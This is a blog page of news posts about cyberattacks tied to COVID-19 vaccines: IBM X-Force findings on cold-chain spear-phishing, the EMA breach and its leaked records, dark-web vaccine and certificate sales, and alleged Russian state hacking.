Search This Blog

Showing posts with label COVID-19 Vaccine. Show all posts

Threat Actors Target Covid-19 Vaccine Cold Chain Via Spear-Phishing Campaign

 

Cybercriminals are continuing to target the COVID-19 vaccine cold chain, the means of delivering and storing vaccines at safe temperatures, with spear-phishing campaigns that leverage pharma and biomedical lures, according to an updated IBM X-Force report. 

Threat actors are specifically targeting transportation, healthcare, IT, and electronics sectors. Researchers also discovered the attackers targeting government agencies and vendors that support public health entities, among other targets.

The latest research is an update of a December IBM X-Force report that shed light on widespread phishing tactics leveraged by cybercriminals against vaccine supply chain organizations and other healthcare sectors. IBM X-Force established a cyber task force at the beginning of the pandemic to track cyber threats targeting critical infrastructure organizations.

The global phishing campaign against cold storage supply chain members was first discovered in September, initially tied to Gavi, the Vaccine Alliance’s Cold Chain Equipment Optimization Platform (CCEOP) program. The threat actors masqueraded as biomedical executives and targeted enterprise leadership members in the IT, finance, sales, and procurement departments, who would likely be involved with vaccine cold chain efforts.

 The attackers sent the messages to multiple employees across the enterprise, with some messages purporting to be of help or support pages of the targeted enterprise. Instead, the messages contained malicious HTML attachments that opened locally on the devices and prompted victims to enter user credentials for access. This week’s update revealed the researchers have detected an additional 50 files tied to spear-phishing emails targeting at least 44 entities in 44 different countries, including the US and Canada. 

“The expanded scope of precision targeting includes key organizations likely underpinning the transport, warehousing, storage, and ultimate distribution of vaccines. Spear-phishing attempts were associated with multiple executive activities and other roles," researchers explained.

Particularly, the cybercriminals are targeting CEOs, purchasing managers, system administrators, presidents, heads of supply and logistics, finance directors, HR officers, and a host of other leaders within the enterprise organization. IBM researchers first noticed the latest phishing campaign directly following the publication of the previous report. The malicious email was addressed to a German pharmaceutical and bioscience solutions company working on vaccine production and associated activities. The target also appeared to be a client of one of the original targets detected in the initial campaign.

“While our previous reporting featured direct targeting of supranational organizations, the energy and IT sectors across six nations, we believe this expansion to be consistent with the established attack pattern, and the campaign remains a deliberate and calculated threat,” wrote the researchers.

IBM: Flags More Cyber Attacks on COVID-19 Vaccine Infrastructure

 

On Wednesday, IBM reported that its cyber-security unit has discovered more digital attacks targeting the global COVID-19 vaccine supply chain since the problem was first reported late last year. 

IBM Security X-Force has now revealed that the number of organizations affected has increased since the previous evaluation. A total of 44 organizations from 14 countries were singled out for attack. The targeted companies are key organizations involved in transportation, warehousing, storage, and distribution in Europe, North America, South America, Africa, and Asia. 

The threat actor began sending spear-phishing emails in early September 2020, before any COVID-19 vaccine variant was approved, in order to pre-position themselves in the evolving infrastructure. The emails requested quotes for the Cold Chain Equipment Optimization Platform (CCEOP) program and mentioned Haier Biomedical products used for storage and transportation of vaccines. 

IBM which has identified 50 files associated with the attacks, states the threat actor has excellent knowledge of the cold chain. Spear-phishing emails impersonating the executive from Chinese biomedical firm Haier Biomedical were extensively used in the attacks. 

IBM stated that “While our previous reporting featured direct targeting of supranational organizations, the energy and IT sectors across six nations, we believe this expansion to be consistent with the established attack pattern, and the campaign remains a deliberate and calculated threat.” 

The attacks used HTML files that included references to solar panel manufacturers and petrochemical companies. Around eight distinct organizations in the aviation, aerospace, shipping, and transportation services industries, as well as biomedical research, medical manufacturing, pharmaceuticals, and hygiene services, were hit by the attackers. Six companies in web-hosting, software creation, IT operations and outsourcing, and online platform provisioning were also affected. 

Government agencies (involved in the import/export of special products, transportation, and public health), as well as establishments in the refrigeration and metal manufacturing industries, were targeted, according to IBM. 

According to IBM security analysts, the attackers were attempting to gain access to the COVID-19 vaccine cold chain for espionage purposes, including information on national Advance Market Commitment (AMC) agreements, distribution timetables, collection or duplication of the electronic documents, and warehousing technical requirements. 

“While clear attribution remains presently unavailable, the rise of ‘vaccine nationalism’ and increased global competition surrounding access to vaccines suggests the higher likelihood of a nation-state operation,” IBM added.

Hacker Hacks Underground Covid Vaccine Market On Dark Web

 

In a recent cybersecurity incident, an attacker hacked down a vaccine marketplace that was running on the dark web. The attacker then placed fake orders, cancelled them after making a refund in Bitcoins worth $752,000, a report released on Thursday says.  As per a blog on the market's forum, the attacker managed to find a way to make fake orders, which he cancelled immediately using the seller account of the trader, and immediately made the refunds in the wild, which was withdrawn in an instant. 

Checkpoint research says the method allowed a hacker to make 13 Bitcoins (BTC), an amount equal to $752,000. Currently, the vaccine marketplace on the dark web which was selling these products is down because of the hack.  But, the attack hasn't put a stop to the sale of Covid-19 relief products on the dark internet. Following the marketplace shutdown, another hacking forum was framed using the same address, offering various ads along with Covid-19 vaccines (documents included) and that too on heavy discounts for promotional purposes.  

Cybersecurity experts recently found out that fake Covid-19 vaccine certificates and duplicate Covid-19 test results were being sold on dark internet and hacking platforms for amount as low as Rs 1800 ($25) and up to Rs 18,000 ($250) for people that are looking to book flights, travel across borders, finding a new job or attending a function.  If an interested user wants to get these 'fake certificates,' he can simply obtain them by sending their details and money to the seller on the dark web, the seller will then e-mails back the forged documents for $250. 

Research from Checkpoint revealed that fake negative Covid-19 test results are available on the dark web for a mere amount of $25.  Covid-19 vaccine ads on the darknet have had a 3 fold increase since the last three months. The selling forums on the dark internet are based from European countries like Spain, Russia, France, and Germany. According to experts, "The vaccines advertised include Oxford-AstraZeneca (at $500), Johnson & Johnson ($600), the Russian Sputnik vaccine ($600) and the Chinese SINOPHARM vaccine." Checkpoint research says, "as a result, the marketplace is down completely since, and at this point of time is yet to be restored online."

Hackers Altered the Covid-19 Vaccine Records

 

The European Union's drug regulator has said that COVID-19 vaccine documents that were purloined from its servers in a cyberattack have been not only leaked on the web but "manipulated" by hackers.

A cyber-attack hit the European Medicines Agency (EMA). At the hour of the divulgence of the hack, the EMA didn't give technical insights concerning the attack, nor any information on whether the attack will affect its operations while it is evaluating and approving COVID-19 vaccines. 

The European agency plays a vital role in the evaluation of COVID-19 vaccines across the EU, it has access to sensitive and confidential data, including quality, safety, and effectiveness of information coming about because of trials. The European Medicines Agency said on Friday that a continuous investigation concerning the cyberattack demonstrated that hackers got emails and records from November identified with the evaluation of experimental Covid vaccines. 

The agency, which regulates medications and drugs across the 27-part EU, had troves of confidential COVID-19 information as a feature of its vaccine approval process. 

"A portion of the correspondence has been manipulated by the culprits before distribution in a manner which could sabotage trust in vaccines," the agency said. It didn't clarify what data was altered — but cybersecurity experts state such practices are typical of disinformation campaigns launched by governments. 

Italian cybersecurity firm Yarix said, "the intention behind the leak by cybercriminals is sure: to cause critical harm to the reputation and credibility of EMA and Pfizer." The agency said that given the overwhelming toll of the pandemic, there was an "urgent public health need to make vaccines accessible to EU residents as quickly as time permits." The EMA demanded that despite that urgency, its decisions to recommend the green-lighting of vaccines were based "on the strength of the scientific proof on a vaccine's safety, quality and efficacy, and nothing else.” 

The agency, which is situated in Amsterdam, went under hefty criticism from Germany and other EU part nations in December for not approving vaccines against the virus all the more rapidly. The EMA gave its first recommendation for the Pfizer and BioNTech vaccine weeks after the shot got approval in Britain, the United States, Canada, and elsewhere. 

The EMA said law enforcement authorities are taking necessary action in response to the cyberattack.

Russians ‘InfoWarrior’ Hackers New Game Changer for the Geopolitical Agenda?

The worse cyber attack of the year 2020 on SolarWinds which was allegedly carried out by Russian state-backed threat actors is signs of advancement in different ways as Moscow is seemingly improving its technical abilities that might pose a bigger threat of cyber espionage globally. 

The attack has compromised many important departments of the U.S. government, big tech companies, hospitals, and universities, showing a big loop of online intrusion, which is illustrating how cyber espionage operations have become a left-hand job for Russian ‘infowarrior’. Should it make the West more concerned about the security of its government or should the whole world consider these attacks as a new normal? 

Russia’s diplomatic relation with the West has always been bitter since the World Wars, and even today the situation continues to border on bitterness. Moscow sees the cyber attacks as a cheap and effective way to achieve and win its geopolitical aspirations, and therefore Russia is unlikely to take a step back from such tactics, whilst facing U.S. sanctions or countermeasures. 

Bilyana Lilly, a researcher at think tank Rand Corp said, “Such operations are a relatively inexpensive and effective way to conduct geopolitics that is crucial for Russia, which is facing considerable economic and demographic challenges and whose economy is smaller than Italy’s. 

Referencing from an article in a Russian military journal, “the complete destruction of the information infrastructures” of the U.S. or Russia could be carried out by just one battalion of 600 “info warriors” at a price tag of $100 million’’. 

It’s been an ardent task for the West to vehemently retort to Moscow’s growing cyber abilities. Washington’s vengeance measures including sanctions, diplomatic expulsions, property seizures, and even big threats such as expulsion from the world-leading economic organizations appear to have little to no impact on its operations. 

Pavel Sharikov, a senior fellow at the Russian Academy of Science’s Institute for U.S. and Canadian Studies said, “Russia doesn’t see sanctions as an instrument of pressure but as an instrument of punishment. The Russian government says, ‘Yes we understand that you don’t like what we are doing, but we don’t really care”. 

Notably, US officials and tech companies have accused the Russian regime of cyber espionage attacks on multiple occasions, including attempts to intervene before the 2020 election. The WSJ discovered how Moscow’s cyber espionage and trolls have enlarged their 2016 toolbox with a new stratagem. 

Inferring from a paper co-written by Rand’s Ms. Lilly, “in recent years, so-called information confrontation has become an established part of Russia’s military doctrine”. In 2019, Gen. Valery Gerasimov, Russia’s General Staff chief, said that in modern warfare, cyberspace “provides opportunities for remote, covert influence not only on critical information infrastructures but also on the population of the country, directly influencing national security.” 

According to the authorities, Moscow is trying to advance its geopolitical agenda by using its cyberattack tactics; the initial target was ex-Soviet countries. It was in 2007 when Russia-backed hackers attacked Estonia which compromised websites government, bank credentials, and newspapers. 

Following up, Ukraine and Georgia have also been attacked. In most cases, states’ media firms, and election infrastructures have been targeted. “Russian state-backed hackers set their sights on the West. In 2014, they penetrated the State Department’s unclassified email system and a White House computer server and stole President Barack Obama’s unclassified schedule, U.S. officials said. 

According to the German authorities, in 2015, they got into the German parliament, in what experts described as the most significant hack in the country’s history’’. 

Interestingly, that's not all, Russia was accused of its interference in the French elections and the ‘Pyeongchang’ Winter Olympics and for the NotPetya malware attacks on the corporate webwork. And now, the Western administration is accusing Russia of cyber espionage attacks against the COVID-19 vaccine supply chain. Russia has denied its involvement. 

Important Documents Related to the Covid-19 Vaccine Leaked on the Darkweb

 

As the pandemic continues to spread globally via a new Covid-19 variant, the attacks on medical agencies surge likewise. Pharmaceutical industries and government organizations continue to face the wrath. As per the sources, the European Medicines Agency (EMA) became the victim of the latest attack, from where “several documents related to the Covid-19 vaccine are allegedly stolen and are released in the Darkweb market, security experts said”.

Security experts from threat intelligence firm Cyble also said, “during the evaluation of data, the experts have found that various confidential files, including MoMs, assessment reports, confidential emails, login portal links and images of its internal pages were accessed and leaked”. The illegal market for Covid-19 vaccines has asserted its malicious influence even more so as it continues to expand in scope and horizon.

In this regard, European Medical Agency said, “EMA has been the subject of a cyber attack. The Agency has swiftly launched a full investigation, in close cooperation with law enforcement and other relevant entities”.

“EMA cannot provide additional details whilst the investigation is ongoing. Further information will be made available in due course”, the agency further added.

The agency is investigating the security incident, however, there is no clarification regarding the source of the attack. Also, whether the hackers were successful in their attempt or not remains unclear as of now.

European Medical Agency have been twice the victim of cyber attacks in recent months, it has become the target of attackers because it has all the necessary and confidential information related to the Covid-19 vaccines, also it has to be noted that it played a massive role in the assessment of Covid-19 vaccines.

The leaked documents are also being shared on the Russian-speaking forums when the threat intelligence firm Cyble started tracking the documents. During the investigation, the experts have also found that the attackers were using the internal email from where the portal link was shared and also the login page for the portal to access the reports, all of which were shared through the screenshots. Furthermore, the documents included the supposed evaluation reports of the Covid-19 vaccine which also comprised the summary report of drug release

Espionage Attacks Increasingly Concentrated on the Covid-19 Vaccine Supply Network

 

Now more than ever, malicious actors are targeting the healthcare space as important research of COVID-19 therapeutics are developed and other medical institutions from the world such as Pfizer, Moderna, and other biotech firms are preparing antidote against the deadly virus. While several pieces of research are underway, it is being discovered that nation-states are now targeting these companies with retribution, as the quest to beat the pandemic continues. 

According to the intelligence, cyber espionage has a keen eye on the COVID-19 vaccine supply network, the malware with the name ‘Zebrocy’ is being used by threat actors in vaccine-related cyberattacks. Earlier this month, reports have shown that documentation of Pfizer and BioNtech vaccine were accessed by threat actors that were submitted to the EU regulators. 

Recent cyber-attacks on firms are not new but threat actors have recently zeroed in on the Covid-19 vaccine chain, capitalizing on the fear of contagion amid the masses. 

COVID-19 vaccine manufacturer Dr. Reddy’s Laboratories has been attacked in October, hence plants have to shut down across India, U.K, Brazil, and the USA. According to the official reports Indian-based firm has contracted to manufacture the Russian “Sputnik V’’ vaccine. 

In July 2020, the U.S. Department of Homeland Security (DHS) had informed and warned the Governments and firms against Russia-linked group APT29 which was targeting the U.S, Canadian, and British Covid-19 vaccine research companies26. 

Notably, when the pandemic began, the World Health Organization (WHO) was also targeted by the DarkHotel APT group, which looked for sensitive information. 

Likewise, the U.S. Justice Department has also accused Chinese-sponsored threat actors of targeting COVID-19 researcher Moderna. 

“Even if you are good at science, this is a cheap insurance policy to maintain a seat at the table for the game of nations,” said Sam Curry, Cybereason CSO. “The headlines around stealing vaccine research, data, and information is used to create vaccines to the world’s pandemic should be a wakeup call to research firms and both the private and public sector. It is not a question of if hacking will be done, but rather how much has already taken place,” 

“Some groups have likely infiltrated these companies and have not been caught, and are pilfering through specific vaccine information, patents and other valuable content,” he further added. “A vaccine for COVID is a strategically valuable (maybe crucial) asset. Whoever gets a vaccine first has an economic advantage and it is worth billions of dollars to a country and its economy. It is the ultimate IP with immediate value.” 

Rob Bathurst, CTO of cybersecurity firm Digitalware said, “The rule of thumb for an attacker is to use just enough to get the job done– and that is usually commercial malware first and custom packages only if needed for a specific target,” 

Warning users, Curry said, “To combat this type of attack, organizations need to continue to improve their security hygiene, implement around-the-clock threat hunting and increase their ability to detect malicious activity early. Security-awareness training is also needed and employees should not open attachments from unknown sources and never download content from dubious sources.”